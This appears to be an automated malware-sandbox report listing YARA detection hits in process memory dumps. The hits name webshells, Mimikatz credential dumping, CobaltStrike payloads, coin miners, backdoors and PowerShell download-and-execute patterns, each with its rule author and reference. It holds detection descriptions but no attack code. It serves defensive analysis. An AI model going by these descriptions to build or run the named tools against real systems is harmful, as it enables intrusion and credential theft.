Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000026.00000003.18354456744.00000138BD776000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18330858645.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18336867211.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18318886682.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_base64_encoded_payloads date = 2021/01/07, author = Arnim Rupp, description = php webshell containing base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 88d0d4696c9cb2d37d16e330e236cb37cfaec4cd
Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000026.00000003.18342844275.00000138BE522000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18332072554.00000138BE522000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18346478440.00000138BD16D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18354111280.00000138BE522000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 00000026.00000003.18342492638.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18299998922.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
